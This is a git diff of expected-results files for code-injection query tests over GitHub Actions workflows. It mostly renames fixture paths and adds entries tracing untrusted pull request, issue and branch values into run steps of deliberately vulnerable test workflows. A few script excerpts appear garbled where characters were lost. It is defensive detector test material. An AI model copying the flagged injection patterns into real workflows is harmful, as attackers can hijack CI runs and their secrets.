.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | .github/workflows/test29.yml:35:18:35:54 | github.event.pull_request.body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | ${{ inputs.body }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | +| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | @@ -695,6 +698,11 @@ subpaths | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 605fa2924ff8..b341ac198536 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -8,16 +8,12 @@ edges | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/actions/external/ultralytics/actions/action.yaml:66:3:66:6 | input body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | @@ -53,7 +49,7 @@ edges | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | -| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | @@ -61,6 +57,11 @@ edges | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | provenance | | | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | provenance | | | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | provenance | | | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | provenance | | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | provenance | | @@ -98,7 +99,7 @@ edges | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -211,6 +212,7 @@ edges | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/actions/external/ultralytics/actions/action.yaml:66:3:66:6 | input body | semmle.label | input body | +| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | semmle.label | inputs.body | +| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | semmle.label | github.head_ref \|\| github.ref | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -336,6 +331,16 @@ nodes | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | @@ -621,6 +626,7 @@ nodes | .github/workflows/test27.yml:41:9:46:2 | Run Step: get-version [chart_version] | semmle.label | Run Step: get-version [chart_version] | | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$( Date: Fri, 13 Dec 2024 12:33:22 -0500 Subject: [PATCH 688/707] Fix pack names --- ql/lib/qlpack.yml | 2 +- 